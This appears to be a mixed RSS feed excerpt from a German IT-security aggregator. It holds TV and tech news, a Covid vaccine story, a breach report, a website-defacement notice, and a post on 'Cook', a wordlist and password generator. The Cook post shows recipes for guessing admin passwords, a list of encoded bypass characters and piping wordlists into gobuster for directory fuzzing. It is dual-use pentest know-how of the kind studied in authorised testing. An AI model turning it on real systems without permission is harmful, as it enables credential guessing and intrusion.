<title><![CDATA[Video: Nintendo Switch-Spiele auf einem Game Boy Advance]]></title>
<description><![CDATA[Die Nintendo Switch-Konsole besitzt zwar einen eigenen Bildschirm, Elliot Coll vom YouTube-Kanal “The Retro Future” nutzte nun allerdings den Game Boy Advance – TV-Tuner von BLAZE, um seine Switch-Spiele auf einem Game Boy Advance zu spielen ...]]></description>
<link>https://tsecurity.de/de/1466905/it-nachrichten/video-nintendo-switch-spiele-auf-einem-game-boy-advance/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1466905/it-nachrichten/video-nintendo-switch-spiele-auf-einem-game-boy-advance/</guid>
<pubDate>Mon, 10 May 2021 13:31:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Nintendo Switch-Konsole besitzt zwar einen eigenen Bildschirm, Elliot Coll vom YouTube-Kanal “The Retro Future” nutzte nun allerdings den Game Boy Advance – TV-Tuner von BLAZE, um seine Switch-Spiele auf einem Game Boy Advance zu spielen ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Cook - A Customizable Wordlist And Password Generator]]></title>
<description><![CDATA[Easily create permutations and combinations of words with predefined sets of extensions, words and patterns/function. You can use this tool to easily create complex endpoints and passwords.  Customizing tool according to your unique secrets keywords.  Easy UX, Checkout UsageInstallation  Using Go...]]></description>
<link>https://tsecurity.de/de/1453678/it-security-nachrichten/cook-a-customizable-wordlist-and-password-generator/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1453678/it-security-nachrichten/cook-a-customizable-wordlist-and-password-generator/</guid>
<pubDate>Tue, 27 Apr 2021 03:15:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://1.bp.blogspot.com/-WG0YPY985tU/YIJeGK53v7I/AAAAAAAAV9Y/XksW9pA0uHgp27kXwSLxY_Aqztq9tK7UACNcBGAsYHQ/s1131/cook_1_01.png" imageanchor="1"><img border="0" data-original-height="509" data-original-width="1131" height="288" src="https://1.bp.blogspot.com/-WG0YPY985tU/YIJeGK53v7I/AAAAAAAAV9Y/XksW9pA0uHgp27kXwSLxY_Aqztq9tK7UACNcBGAsYHQ/w640-h288/cook_1_01.png" width="640"></a></div><h3 align="center"><br>  </h3><p>Easily create permutations and combinations of words with predefined sets of extensions, words and patterns/function. You can use this tool to easily create complex <a href="https://www.kitploit.com/search/label/Endpoints" target="_blank" title="endpoints">endpoints</a> and passwords.  <a href="https://github.com/giteshnxtlvl/cook#customizing-tool" rel="nofollow" target="_blank" title="Customizing tool">Customizing tool</a> according to your <strong>unique secrets keywords</strong>.<br>  Easy UX, Checkout <a href="https://github.com/giteshnxtlvl/cook#usage" rel="nofollow" target="_blank" title="Usage">Usage</a></p><span><a name="more"></a></span><div><br></div><span><b>Installation</b></span><br>  <br><b>Using Go</b><br>  <pre><code>  go get github.com/giteshnxtlvl/cook<br></code></pre>  <p>OR</p>  <pre><code>  GO111MODULE=on go get github.com/giteshnxtlvl/cook<br></code></pre>  <br><b>Update</b><br>  <pre><code>  go get -u github.com/giteshnxtlvl/cook<br></code></pre>  <br><b>Download latest builds</b><br>  <p><a href="https://github.com/giteshnxtlvl/cook/releases/" rel="nofollow" target="_blank" title="https://github.com/giteshnxtlvl/cook/releases/">https://github.com/giteshnxtlvl/cook/releases/</a></p>  <br><span><b>Customizing tool</b></span><br>  <p>By customizing you will able to make and use your own lists and patterns/functions.</p>  <ol>  <li>Create empty file named <code>cook.yaml</code>  <em>or</em>  Download <a href="https://github.com/giteshnxtlvl/cook/blob/main/cook.yaml" rel="nofollow" target="_blank" title="cook.yaml">cook.yaml</a></li>  <li>Create an environment variable <code>COOK</code> =<code>Path of file</code>  <a href="https://www.schrodinger.com/kb/1842" rel="nofollow" target="_blank" title="How to setup up env variable?">How to setup up env variable?</a></li>  <li>Done, Run <code>cook -config</code></li>  </ol>  <br><span><b>Basic Permutation</b></span><br>  <p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-TAmlS-0Znts/YIJeNC1YlbI/AAAAAAAAV9c/KoIbLaj7_HUg_wBUaucl3WQO4Vxm_XRngCNcBGAsYHQ/s1236/cook_2_02.png" imageanchor="1"><img border="0" data-original-height="739" data-original-width="1236" height="382" src="https://1.bp.blogspot.com/-TAmlS-0Znts/YIJeNC1YlbI/AAAAAAAAV9c/KoIbLaj7_HUg_wBUaucl3WQO4Vxm_XRngCNcBGAsYHQ/w640-h382/cook_2_02.png" width="640"></a></div><p> </p>  <p><strong>Recipe</strong></p>  <pre><code>  cook -start admin,root  -sep _,-  -end secret,critical  start:sep:end<br></code></pre>  <pre><code>  cook admin,root:_,-:secret,critical<br></code></pre>  <br><span><b>Advance Permutation</b></span><br>  <p>Understanding concept is important!  <a href="https://github.com/giteshnxtlvl/cook/blob/main/images/09.png" rel="nofollow" target="_blank" title="A customizable wordlist and password generator. (31)"></a></p><p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-hs2BvRHlcv4/YIJeSpuIoJI/AAAAAAAAV9g/PVb1FC8BltEH6bMRdHSA9xHsFoKZinD7wCNcBGAsYHQ/s1114/cook_3_09.png" imageanchor="1"><img border="0" data-original-height="1093" data-original-width="1114" height="628" src="https://1.bp.blogspot.com/-hs2BvRHlcv4/YIJeSpuIoJI/AAAAAAAAV9g/PVb1FC8BltEH6bMRdHSA9xHsFoKZinD7wCNcBGAsYHQ/w640-h628/cook_3_09.png" width="640"></a></div><p><br></p><span><b>Predefined Sets</b></span><br>  <p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-gwR6KxSxgdM/YIJeY_dBO1I/AAAAAAAAV9o/QISDaIhFovQ8amIeuucxg41XhYA8iQRAQCNcBGAsYHQ/s1263/cook_4_03.png" imageanchor="1"><img border="0" data-original-height="791" data-original-width="1263" height="400" src="https://1.bp.blogspot.com/-gwR6KxSxgdM/YIJeY_dBO1I/AAAAAAAAV9o/QISDaIhFovQ8amIeuucxg41XhYA8iQRAQCNcBGAsYHQ/w640-h400/cook_4_03.png" width="640"></a></div><p><br></p>  <p><strong>Recipe</strong></p>  <pre><code> cook -start admin,root  -sep _ -end secret  start:sep:archive<br></code></pre>  <pre><code> cook admin,root:_:archive<br></code></pre>  <br><span><b>Create your own unique sets</b></span><br>  <p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-WrX0yYl-AlE/YIJedlH_oSI/AAAAAAAAV9w/ZXa07hSAiWAFsIfzS5AOplu9YUUHE1j9gCNcBGAsYHQ/s1196/cook_5_06.png" imageanchor="1"><img border="0" data-original-height="409" data-original-width="1196" height="218" src="https://1.bp.blogspot.com/-WrX0yYl-AlE/YIJedlH_oSI/AAAAAAAAV9w/ZXa07hSAiWAFsIfzS5AOplu9YUUHE1j9gCNcBGAsYHQ/w640-h218/cook_5_06.png" width="640"></a></div><p><br></p><span><b>Use it like CRUNCH</b></span><br>  <p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-vfLxNTmNVn0/YIJejUXS-mI/AAAAAAAAV94/5N-g3NcZV-0yfhOH3cDyocSjEdW-wLMCACNcBGAsYHQ/s1100/cook_6_08.png" imageanchor="1"><img border="0" data-original-height="567" data-original-width="1100" height="330" src="https://1.bp.blogspot.com/-vfLxNTmNVn0/YIJejUXS-mI/AAAAAAAAV94/5N-g3NcZV-0yfhOH3cDyocSjEdW-wLMCACNcBGAsYHQ/w640-h330/cook_6_08.png" width="640"></a></div><p><br></p><span><b>Patterns/Functions</b></span><br>  <p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-nbJxbvsnUSA/YIJemzW7iKI/AAAAAAAAV98/_uXQ64ganrktFPML2XmncvtXbyVGR6dXQCNcBGAsYHQ/s1084/cook_7_11.png" imageanchor="1"><img border="0" data-original-height="944" data-original-width="1084" height="558" src="https://1.bp.blogspot.com/-nbJxbvsnUSA/YIJemzW7iKI/AAAAAAAAV98/_uXQ64ganrktFPML2XmncvtXbyVGR6dXQCNcBGAsYHQ/w640-h558/cook_7_11.png" width="640"></a></div><p> </p>  <p><strong>Recipe</strong></p>  <pre><code>  cook -name elliot -birth date(17,Sep,1994) name:birth<br></code></pre>  <br><span><b>Int Ranges</b></span><br>  <p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-RYh1IQiox0U/YIJeq0EgfMI/AAAAAAAAV-E/-vGqqpYI9ywB08iNsInV1FnPhsw907eWACNcBGAsYHQ/s1029/cook_8_13.png" imageanchor="1"><img border="0" data-original-height="450" data-original-width="1029" height="280" src="https://1.bp.blogspot.com/-RYh1IQiox0U/YIJeq0EgfMI/AAAAAAAAV-E/-vGqqpYI9ywB08iNsInV1FnPhsw907eWACNcBGAsYHQ/w640-h280/cook_8_13.png" width="640"></a></div><p><br></p><span><b>Files</b></span><br>  <br><span><b>Regex Input from File</b></span><br>  <p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-FvZiExd7XAY/YIJeuG3M1vI/AAAAAAAAV-I/nEaT9hPgTnkufQcvM9SzJggUqbOdarVGQCNcBGAsYHQ/s1118/cook_9_07.png" imageanchor="1"><img border="0" data-original-height="396" data-original-width="1118" height="226" src="https://1.bp.blogspot.com/-FvZiExd7XAY/YIJeuG3M1vI/AAAAAAAAV-I/nEaT9hPgTnkufQcvM9SzJggUqbOdarVGQCNcBGAsYHQ/w640-h226/cook_9_07.png" width="640"></a></div><p><br></p>  <p><strong>Recipe</strong></p>  <pre><code> cook -exp raft-large-extensions.txt:\.asp.*  /:admin:exp<br></code></pre>  <br><span><b>Save <a href="https://www.kitploit.com/search/label/Wordlists" target="_blank" title="Wordlists">Wordlists</a> by Unique Names</b></span><br>  <p><br></p><p></p><div class="separator"><a href="https://1.bp.blogspot.com/-RhYCEbNmyuU/YIJe40YQZSI/AAAAAAAAV-U/jRpW2xp_rh8hrDC-jX7_6_vQTgdOfsAWgCNcBGAsYHQ/s1098/cook_10_05.png" imageanchor="1"><img border="0" data-original-height="393" data-original-width="1098" height="230" src="https://1.bp.blogspot.com/-RhYCEbNmyuU/YIJe40YQZSI/AAAAAAAAV-U/jRpW2xp_rh8hrDC-jX7_6_vQTgdOfsAWgCNcBGAsYHQ/w640-h230/cook_10_05.png" width="640"></a></div><br><p></p><span><b>File not found</b></span><br>  <p>If file mentioned in param not found, then there will be no errors, instead it will do this</p>  <pre><code> cook -file file_not_exists.txt admin,root:_:file<br></code></pre>  <pre><code>  admin_file_not_exists.txt<br>  root_file_not_exists.txt<br></code></pre>  <br><span><b>Cases</b></span><br>  <p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-607Xg-tYXgs/YIJe-O93VwI/AAAAAAAAV-g/QxqHA81lXJs9I5fguXNfVHuN23ZqGjfMQCNcBGAsYHQ/s1084/cook_11_12.png" imageanchor="1"><img border="0" data-original-height="972" data-original-width="1084" height="574" src="https://1.bp.blogspot.com/-607Xg-tYXgs/YIJe-O93VwI/AAAAAAAAV-g/QxqHA81lXJs9I5fguXNfVHuN23ZqGjfMQCNcBGAsYHQ/w640-h574/cook_11_12.png" width="640"></a></div><p><br></p><span><b>Using COOK with other tools</b></span><br>  <br><span><b>Direct fuzzing with <a href="https://github.com/OJ/gobuster" rel="nofollow" target="_blank" title="GoBuster">GoBuster</a></b></span><br>  <pre><code> cook admin,root:_:archive | <a href="https://www.kitploit.com/search/label/Gobuster" target="_blank" title="gobuster">gobuster</a> dir -u https://example.com/ -w -<br></code></pre>  <br><span><b>Useful Resources</b></span><br>  <table>  <tr>  <th>List</th>  <th>Description</th>  </tr>  <tr>  <td><a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-large-extensions.txt" rel="nofollow" target="_blank" title="raft-large-extensions.txt">raft-large-extensions.txt</a></td>  <td>List of all extensions</td>  </tr>  <tr>  <td><a href="https://raw.githubusercontent.com/publicsuffix/list/master/public_suffix_list.dat" rel="nofollow" target="_blank" title="all_tlds.txt">all_tlds.txt</a></td>  <td>List of all tlds</td>  </tr>  </table>  <br><span><b>Todo</b></span><br>  <ul>  <li>Endpoints Analyser</li>  <li>Interactive mode for configuring <code>cook.yaml</code></li>  </ul>  <br><span><b>All Sets</b></span><br>  <div><pre><code># Character set like crunch<br>charSet:<br>    sep   : [_- ] #common separators<br>    n     : [0123456789]<br>    A     : [ABCDEFGHIJKLMNOPQRSTUVWXYZ]<br>    a     : [abcdefghijklmnopqrstuvwxyz]<br>    aAn   : [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]<br>    An    : [ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789]<br>    an    : [abcdefghijklmnopqrstuvwxyz0123456789]<br>    aA    : [abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ]<br>    s     : ["!#$%&amp;'()*+,-./:;&lt;=&gt;?@[\\]^_`{|}~&amp;\""]<br>    all   : ["!#$%&amp;'()*+,-./0123456789:;&lt;=&gt;?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\""]<br><br># File to access from anywhere<br>files:<br>    raft_ext     : [E:\tools\wordlists\SecLists\Discovery\Web-Content\raft-large-extensions.txt]<br>    raft_dir     : [E:\tools\wordlists\SecLists\Discovery\Web-Content\raft-large-directories.txt]<br>    raft_files   : [E:\tools\wordlists\SecLists\Discovery\Web-Co   ntent\raft-large-files.txt]<br>    robot_1000   : [E:\tools\wordlists\SecLists\Discovery\Web-Content\RobotsDisallowed-Top1000.txt]<br><br># Create your lists<br>lists:<br>    schemas      : [aim, callto, cvs, data, facetime, feed, file, ftp, git, gopher, gtalk, h323, hdl, http, https, imap, irc, irc6, ircs, itms, javascript, magnet, mailto, mms, msnim, news, nntp, prospero, rsync, rtsp, rtspu, sftp, shttp, sip, sips, skype, smb, snews, ssh, svn, svn, svn+ssh, telnet, tel, wais, ymsg]<br>    bypass       : ["%00", "%09", "%0A", "%0D", "%0D%0A"]<br><br>    admin_set    : [admin, root, su, superuser, administration]<br>    api          : [/v1/,/v2/,/v3/,/v4/,/v5/,/api/]<br>    pass_ends    : [123, "@123", "#123"]<br><br>    months       : [January, February, March, April, May, June, July, August, September, October, November, December]<br>    mons         : [Jan, Feb, Mar, Apr, May, Jun, Jul, Aug, Sep, Oct, Nov, Dec]<br><br># Patterns<br>patterns:<br>    date : <br>           - date(D,M,Y)<br>        - DMY  <br>        - MDY <br>        - D/M/Y  <br>        - M/D/Y <br>        - D-M-Y  <br>        - M-D-Y   <br>        - D.M.Y  <br>        - M.D.Y  <br>        - D.Y  <br>        - M.Y  <br>        - D.M<br><br><br># Extension Set, . will added before using this<br>extensions:<br>    config  : [conf, confq, config]<br>    data    : [xml, json, yaml, yml]<br>    backup  : [bak, backup, backup1, backup2]<br>    exec    : [exe, msi, bin, command, sh, bat, crx]<br>    web     : [html, html5, htm, js, jsx, jsp, wasm, php, php3, php5, php7]<br>    iis     : [asax, ascx, asmx, aspx, exe, aspx.cs, ashx, axd, config, htm, jar, js, rdl, swf, txt, xls, xml, xsl, zpd, suo, sln]<br>    archive : [7z, a, apk, xapk, ar, bz2, cab, cpio, deb, dmg, egg, gz, iso, jar, lha, mar, pea, rar, rpm, s7z, shar, tar, tbz2, tgz, tlz, war, whl, xpi, zip, zipx, xz, pak, tar.gz, gz]<br>    code    : [c, cc, class, clj, cpp, cs, cxx, el, go, h, java, lua, m,    m4, php, php3, php5, php7, pl, po, py, rb, rs, sh, swift, vb, vcxproj, xcodeproj, xml, diff, patch, js, jsx]<br><br>    #Rest<br>    css_type: [css, less, scss]<br>    sheet   : [ods, xls, xlsx, csv, ics vcf]<br>    slide   : [ppt, pptx, odp]<br>    font    : [eot, otf, ttf, woff, woff2]<br>    text    : [doc, docx, ebook, log, md, msg, odt, org, pages, pdf, rtf, rst, tex, txt, wpd, wps]<br>    audio   : [aac, aiff, ape, au, flac, gsm, it, m3u, m4a, mid, mod, mp3, mpa, pls, ra, s3m, sid, wav, wma, xm]<br>    book    : [mobi, epub, azw1, azw3, azw4, azw6, azw, cbr, cbz]<br>    video   : [3g2, 3gp, aaf, asf, avchd, avi, drc, flv, m2v, m4p, m4v, mkv, mng, mov, mp2, mp4, mpe, mpeg, mpg, mpv, mxf, nsv, ogg, ogv, ogm, qt, rm, rmvb, roq, srt, svi, vob, webm, wmv, yuv]<br>    image   : [3dm, 3ds, max, bmp, dds, gif, jpg, jpeg, png, psd, xcf, tga, thm, tif, tiff, yuv, ai, eps, ps, svg, dwg, dxf, gpx, kml, kmz, webp]<br><br></code></pre></div>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/giteshnxtlvl/cook" rel="nofollow" target="_blank" title="Download Cook">Download Cook</a></span></b></div><img src="http://feeds.feedburner.com/~r/PentestTools/~4/tNnnJY9_hW4" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Große Überraschung bei Law &amp; Order- Organized Crime: Wird aus Benson und Stabler jetzt ein Paar?]]></title>
<description><![CDATA[Beim "Law & Order: Special Victims Unit"-Ableger "Organized Crime" erklärt Elliot Stabler Olivia Benson seine Liebe - oder doch nicht? Netzwelt weiß mehr.
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,																	Entertainment,													...]]></description>
<link>https://tsecurity.de/de/1449924/it-nachrichten/grosse-ueberraschung-bei-law-amp-order-organized-crime-wird-aus-benson-und-stabler-jetzt-ein-paar/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1449924/it-nachrichten/grosse-ueberraschung-bei-law-amp-order-organized-crime-wird-aus-benson-und-stabler-jetzt-ein-paar/</guid>
<pubDate>Fri, 23 Apr 2021 20:16:59 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Beim "Law &amp; Order: Special Victims Unit"-Ableger "Organized Crime" erklärt Elliot Stabler Olivia Benson seine Liebe - oder doch nicht? Netzwelt weiß mehr.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/law--order-organized-crime/index.html">Law &amp; Order - Organized Crime: Episodenguide und Staffeln</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=SlfjyhRROc4:SDgdGGJ2Idk:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/SlfjyhRROc4" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[How a Researcher 'Clinging To the Fringes of Academia' Helped Develop a Covid-19 Vaccine]]></title>
<description><![CDATA[Long-time Slashdot reader destinyland writes:

The New York Times tells the story of Hungarian-born Dr. Kariko, whose father was a butcher and who growing up had never met a scientist — but knew they wanted to be one. Despite earning a Ph.D. at Hungary's University of Szeged and working as a post...]]></description>
<link>https://tsecurity.de/de/1436019/it-security-nachrichten/how-a-researcher-clinging-to-the-fringes-of-academia-helped-develop-a-covid-19-vaccine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1436019/it-security-nachrichten/how-a-researcher-clinging-to-the-fringes-of-academia-helped-develop-a-covid-19-vaccine/</guid>
<pubDate>Sun, 11 Apr 2021 22:45:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Long-time Slashdot reader destinyland writes:

The New York Times tells the story of Hungarian-born Dr. Kariko, whose father was a butcher and who growing up had never met a scientist — but knew they wanted to be one. Despite earning a Ph.D. at Hungary's University of Szeged and working as a postdoctoral fellow at its Biological Research Center, Kariko never found a permanent position after moving to the U.S., "instead clinging to the fringes of academia." 

Now 66 years old, Dr. Kariko is suddenly being hailed as "one of the heroes of Covid-19 vaccine development," after spending an entire career focused on mRNA, "convinced mRNA could be used to instruct cells to make their own medicines, including vaccines." 

From the article:
For many years her career at the University of Pennsylvania was fragile. She migrated from lab to lab, relying on one senior scientist after another to take her in. She never made more than $60,000 a year... She needed grants to pursue ideas that seemed wild and fanciful. She did not get them, even as more mundane research was rewarded. "When your idea is against the conventional wisdom that makes sense to the star chamber, it is very hard to break out," said Dr. David Langer, a neurosurgeon who has worked with Dr. Kariko... Kariko's husband, Bela Francia, manager of an apartment complex, once calculated that her endless workdays meant she was earning about a dollar an hour. 
The Times also describes a formative experience in 1989 with cardiologist Elliot Barnathan:

One fateful day, the two scientists hovered over a dot-matrix printer in a narrow room at the end of a long hall. A gamma counter, needed to track the radioactive molecule, was attached to a printer. It began to spew data. 

Their detector had found new proteins produced by cells that were never supposed to make them — suggesting that mRNA could be used to direct any cell to make any protein, at will. 

"I felt like a god," Dr. Kariko recalled. 

Yet Kariko was eventually left without a lab or funds for research, until a chance meeting at a photocopying machine led to a partnership with Dr. Drew Weissman of the University of Pennsylvania:

"We both started writing grants," Dr. Weissman said. "We didn't get most of them. People were not interested in mRNA. The people who reviewed the grants said mRNA will not be a good therapeutic, so don't bother.'" Leading scientific journals rejected their work. When the research finally was published, in Immunity, it got little attention... "We talked to pharmaceutical companies and venture capitalists. No one cared," Dr. Weissman said. "We were screaming a lot, but no one would listen." 

Eventually, though, two biotech companies took notice of the work: Moderna, in the United States, and BioNTech, in Germany. Pfizer partnered with BioNTech, and the two now help fund Dr. Weissman's lab.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=How+a+Researcher+'Clinging+To+the+Fringes+of+Academia'+Helped+Develop+a+Covid-19+Vaccine%3A+https%3A%2F%2Fbit.ly%2F2OFdQeF"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F21%2F04%2F11%2F1638238%2Fhow-a-researcher-clinging-to-the-fringes-of-academia-helped-develop-a-covid-19-vaccine%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/21/04/11/1638238/how-a-researcher-clinging-to-the-fringes-of-academia-helped-develop-a-covid-19-vaccine?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[http://sindhlaws.gov.pk/elliot.html]]></title>
<description><![CDATA[http://sindhlaws.gov.pk/elliot.html notified by NULL SQU4D]]></description>
<link>https://tsecurity.de/de/1427593/hacking/httpsindhlawsgovpkelliothtml/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1427593/hacking/httpsindhlawsgovpkelliothtml/</guid>
<pubDate>Thu, 01 Apr 2021 18:30:47 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[http://sindhlaws.gov.pk/elliot.html notified by NULL SQU4D]]></content:encoded>
</item>
<item>
<title><![CDATA[Over 100 million MobiKwik user data leaked in Cyber Attack]]></title>
<description><![CDATA[MobiKwik, an India company that facilitates mobile based payment services, is trending on Google for alleged data breach that the company has readily denied. Going further into details, a French Cybersecurity researcher named Elliot Anderson is claiming to have found a data trove of over 3.5 mill...]]></description>
<link>https://tsecurity.de/de/1425202/it-security-nachrichten/over-100-million-mobikwik-user-data-leaked-in-cyber-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1425202/it-security-nachrichten/over-100-million-mobikwik-user-data-leaked-in-cyber-attack/</guid>
<pubDate>Tue, 30 Mar 2021 17:15:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>MobiKwik, an India company that facilitates mobile based payment services, is trending on Google for alleged data breach that the company has readily denied. Going further into details, a French Cybersecurity researcher named Elliot Anderson is claiming to have found a data trove of over 3.5 million accounts available for sale on the dark web. […]</p>
<p>The post <a rel="nofollow" href="https://www.cybersecurity-insiders.com/over-100-million-mobikwik-user-data-leaked-in-cyber-attack/">Over 100 million MobiKwik user data leaked in Cyber Attack</a> appeared first on <a rel="nofollow" href="https://www.cybersecurity-insiders.com/">Cybersecurity Insiders</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Law &amp; Order - Organized Crime: Neue Probleme beim SVU-Ableger um Elliot Stabler]]></title>
<description><![CDATA[Schlechte Nachrichten für Elliot Stabler-Fans: Die Produktion des neuen "Law & Order"-Spin-offs "Organized Crime" muss aus Sicherheitsgründen eine Pause einlegen, wie euch Netzwelt verrät.
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,										...]]></description>
<link>https://tsecurity.de/de/1420780/it-nachrichten/law-amp-order-organized-crime-neue-probleme-beim-svu-ableger-um-elliot-stabler/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1420780/it-nachrichten/law-amp-order-organized-crime-neue-probleme-beim-svu-ableger-um-elliot-stabler/</guid>
<pubDate>Thu, 25 Mar 2021 16:45:56 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Schlechte Nachrichten für Elliot Stabler-Fans: Die Produktion des neuen "Law &amp; Order"-Spin-offs "Organized Crime" muss aus Sicherheitsgründen eine Pause einlegen, wie euch Netzwelt verrät.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/law--order-organized-crime/index.html">Law &amp; Order - Organized Crime: Alle Infos und News zu Start, Handlung und Besetzung</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=BAyleZqph0E:jxOuTJ0Yi0w:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/BAyleZqph0E" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Law &amp; Order: SVU-Hammer: Dann kehrt Fan-Liebling Elliot Stabler zurück!]]></title>
<description><![CDATA[Darauf haben Fans gewartet: Endlich ist bekannt, wann Elliot Stabler zu "Law & Order: SVU" zurückkehrt! Den Termin verrät euch Netzwelt.
																					Dieser Artikel wurde einsortiert unter 
																	TV-Serie / Webserie,																	Entertainment,																	NBC,										...]]></description>
<link>https://tsecurity.de/de/1370723/it-nachrichten/law-amp-order-svu-hammer-dann-kehrt-fan-liebling-elliot-stabler-zurueck/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1370723/it-nachrichten/law-amp-order-svu-hammer-dann-kehrt-fan-liebling-elliot-stabler-zurueck/</guid>
<pubDate>Thu, 04 Feb 2021 21:46:23 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Darauf haben Fans gewartet: Endlich ist bekannt, wann Elliot Stabler zu "Law &amp; Order: SVU" zurückkehrt! Den Termin verrät euch Netzwelt.
																					Dieser Artikel wurde einsortiert unter 
																	<a href="https://www.netzwelt.de/serien/index.html">TV-Serie / Webserie</a>,																	<a href="https://www.netzwelt.de/video/index.html">Entertainment</a>,																	<a href="https://www.netzwelt.de/tv-sender/nbc.html">NBC</a>,																	<a href="https://www.netzwelt.de/serien/index.html">Serien</a>,																	<a href="https://www.netzwelt.de/serien/law--order-special-victims-unit/index.html">Law &amp; Order - Special Victims Unit: Staffeln und Episodenguide</a>,																	<a href="https://www.netzwelt.de/serien/law--order-organized-crime/index.html">Law &amp; Order Organized Crime: Alle Infos und News zu Start, Handlung und Besetzung</a>.<div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/netzwelt?a=l3rR8lpqpFQ:Wf-29yfkcY0:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/netzwelt?d=qj6IDK7rITs" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/netzwelt/~4/l3rR8lpqpFQ" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[After 28 Years, Tucows Finally Closes Its Downloads Site]]></title>
<description><![CDATA["We have made the difficult decision to retire the Tucows Downloads site," writes CEO Elliot Noss in a blog post at Tucows.com/retired:

We're pleased to say that much of the software and other assets that made up the Tucows Downloads library have been transferred to our friends at the Internet A...]]></description>
<link>https://tsecurity.de/de/1360024/it-security-nachrichten/after-28-years-tucows-finally-closes-its-downloads-site/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1360024/it-security-nachrichten/after-28-years-tucows-finally-closes-its-downloads-site/</guid>
<pubDate>Mon, 25 Jan 2021 12:30:10 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["We have made the difficult decision to retire the Tucows Downloads site," writes CEO Elliot Noss in a blog post at Tucows.com/retired:

